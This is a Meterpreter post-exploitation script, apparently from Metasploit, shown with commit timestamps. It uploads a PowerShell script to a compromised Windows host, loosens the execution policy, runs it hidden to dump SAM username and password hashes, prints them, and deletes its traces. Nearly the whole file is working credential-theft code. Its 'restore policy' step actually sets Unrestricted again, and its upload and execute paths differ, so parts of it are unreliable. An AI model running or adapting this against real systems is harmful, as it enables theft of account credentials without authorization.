2010-10-17 17:39:43 +00:00
|
|
|
#
|
|
|
|
# Meterpreter script for utilizing purely PowerShell to extract username and password hashes through registry
|
|
|
|
# keys. This script requires you to be running as system in order to work properly. This has currently been
|
|
|
|
# tested on Server 2008 and Windows 7, which install PowerShell by default.
|
|
|
|
#
|
|
|
|
# Script and code written by: Kathy Peters, Joshua Kelley (winfang), and David Kennedy (rel1k)
|
|
|
|
#
|
|
|
|
# Special thanks to Carlos Perez for the template from GetCounterMeasures.rb
|
|
|
|
#
|
|
|
|
# Script version 0.0.1
|
|
|
|
#
|
|
|
|
|
|
|
|
session = client
|
|
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
2013-09-30 18:47:53 +00:00
|
|
|
"-h" => [ false, "Help menu." ]
|
2010-10-17 17:39:43 +00:00
|
|
|
)
|
|
|
|
|
|
|
|
def usage
|
2013-09-30 18:47:53 +00:00
|
|
|
print_line("PowerDump -- Dumping the SAM database through PowerShell")
|
|
|
|
print_line("Dump username and password hashes on systems that have")
|
|
|
|
print_line("PowerShell installed on the system. Win7 and 2008 tested.")
|
|
|
|
print(@@exec_opts.usage)
|
|
|
|
raise Rex::Script::Completed
|
2010-10-17 17:39:43 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
#-------------------------------------------------------------------------------
|
|
|
|
# Actual Hashdump here
|
|
|
|
|
|
|
|
def dumphash(session)
|
|
|
|
|
2013-10-02 19:17:11 +00:00
|
|
|
path = File.join( Msf::Config.data_directory, "exploits", "powershell" )
|
2010-10-17 17:39:43 +00:00
|
|
|
|
2013-09-30 18:47:53 +00:00
|
|
|
print_status("Running PowerDump to extract Username and Password Hashes...")
|
|
|
|
filename=("#{rand(100000)}.ps1")
|
|
|
|
hash_dump=("#{rand(100000)}")
|
|
|
|
session.fs.file.upload_file("%TEMP%\\#{filename}","#{path}/powerdump.ps1")
|
|
|
|
print_status("Uploaded PowerDump as #{filename} to %TEMP%...")
|
|
|
|
opmode = ""
|
|
|
|
print_status("Setting ExecutionPolicy to Unrestricted...")
|
|
|
|
session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
|
|
|
|
print_status("Dumping the SAM database through PowerShell...")
|
|
|
|
session.sys.process.execute("powershell C:\\Windows\\Temp\\#{filename} >> C:\\Windows\\Temp\\#{hash_dump}", nil, {'Hidden' => 'true', 'Channelized' => true})
|
|
|
|
sleep(10)
|
|
|
|
hashes=session.fs.file.new("%TEMP%\\#{hash_dump}", "rb")
|
|
|
|
begin
|
|
|
|
while ((data = hashes.read) != nil)
|
|
|
|
data=data.strip
|
|
|
|
print_line(data)
|
|
|
|
end
|
|
|
|
rescue EOFError
|
|
|
|
ensure
|
|
|
|
hashes.close
|
|
|
|
end
|
|
|
|
print_status("Setting Execution policy back to Restricted...")
|
|
|
|
session.sys.process.execute("powershell Set-ExecutionPolicy Unrestricted", nil, {'Hidden' => 'true', 'Channelized' => true})
|
|
|
|
print_status("Cleaning up after ourselves...")
|
|
|
|
session.sys.process.execute("cmd /c del %TEMP%\\#{filename}", nil, {'Hidden' => 'true', 'Channelized' => true})
|
|
|
|
session.sys.process.execute("cmd /c del %TEMP%\\#{hash_dump}", nil, {'Hidden' => 'true', 'Channelized' => true})
|
2010-10-17 17:39:43 +00:00
|
|
|
|
|
|
|
end
|
|
|
|
print_status("PowerDump v0.1 - PowerDump to extract Username and Password Hashes...")
|
|
|
|
dumphash(session)
|